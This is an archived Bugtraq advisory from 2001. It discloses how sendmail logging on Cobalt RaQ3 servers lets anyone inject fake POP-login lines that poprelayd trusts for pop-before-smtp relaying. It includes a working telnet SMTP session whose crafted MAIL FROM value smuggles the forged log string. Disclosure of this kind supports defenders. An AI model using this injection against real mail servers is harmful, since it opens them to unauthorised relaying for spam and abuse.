Bugtraq mailing list archives
poprelayd and sendmail relay authentication problem (Cobalt Raq3)
From: Andrea Barisani <lcars () infis univ trieste it>
Date: Tue, 3 Jul 2001 19:05:10 +0200 (CEST)
Hi to all, Poprelayd is a simple script that scan /var/log/maillog for valid pop logins and updates a hash db used by sendmail to permit relaying for those valid pop users, this method is called "Pop-before-smtp". The syslog string searched by the script is in this form for the qpop server /POP login by user \"[\-\_\w]+\" at \(.+\) ([0-9]\.]+)/) On some cobalt raq3 servers (with the poprelayd add-on packet installed ) and in general on any system running the poprelayd script with sendmail is possible to "inject" this string in the syslog using sendmail logging. So anyone can insert a fake string with his own IP wich will be parsed by poprelayd and that will permit the use of sendmail as a relay. On cobalts the presence of poprelayd is revealed by the modified sendmail relaying denied message "Relaying denied. Please check your mail first." Example: telnet dumbcobalt 25 Trying 123.123.123.123... Connected to dumbcobalt ... ehlo dumbcobalt ... mail from:"POP login by user "admin" at (66.66.66.66) 66.66.66.66 @linux.org" 553 "POP login by user "admin" at (66.66.66.66) 66.66.66.66 @linux.org"...Domain name required now the IP 66.66.66.66 can do relay :) in fact, on dumbcobalt: in /var/log/maillog ...reject=533 "POP login by user "admin" at (66.66.66.66) 66.66.66.66 @linux.org", size=0, class=0 ....etc etc... [root@dumbcobalt /]# /usr/sbin/poprelayd -p 66.66.66.66 7 ;-) Bye ------------------------------------------------------------ INFIS Network Administrator & Security Officer Department of Physics - University of Trieste lcars () infis univ trieste it - PGP Key 0x8E21FE82 ------------------------------------------------------------ "How would you know I'm mad?" said Alice. "You must be,'said the Cat,'or you wouldn't have come here." ------------------------------------------------------------
Current thread:
- poprelayd and sendmail relay authentication problem (Cobalt Raq3) Andrea Barisani (Jul 04)
- Re: poprelayd and sendmail relay authentication problem (Cobalt Raq3) Will DeHaan (Jul 09)
- <Possible follow-ups>
- Re: poprelayd and sendmail relay authentication problem (Cobalt Raq3) Ram'on Reyes Carri'on (Jul 06)
- Re: poprelayd and sendmail relay authentication problem (Cobalt Raq3) Christopher X. Candreva (Jul 07)
- Re: poprelayd and sendmail relay authentication problem (Cobalt Raq3) Chris Adams (Jul 09)
- Re: poprelayd and sendmail relay authentication problem (Cobalt Raq3) Todd R. Eigenschink (Jul 09)
- Re: poprelayd and sendmail relay authentication problem (Cobalt Raq3) bdoctor (Jul 09)
- Re[2]: poprelayd and sendmail relay authentication problem (Cobalt Raq3) Christoph Kuhles (Jul 09)
- Re: poprelayd and sendmail relay authentication problem (Cobalt Raq3) Jason Clifford (Jul 09)
- Re: poprelayd and sendmail relay authentication problem (Cobalt Raq3) Walter Reed (Jul 09)
- Re: poprelayd and sendmail relay authentication problem (Cobalt Raq3) Christopher X. Candreva (Jul 07)
- Re: poprelayd and sendmail relay authentication problem Ed Ravin (Jul 07)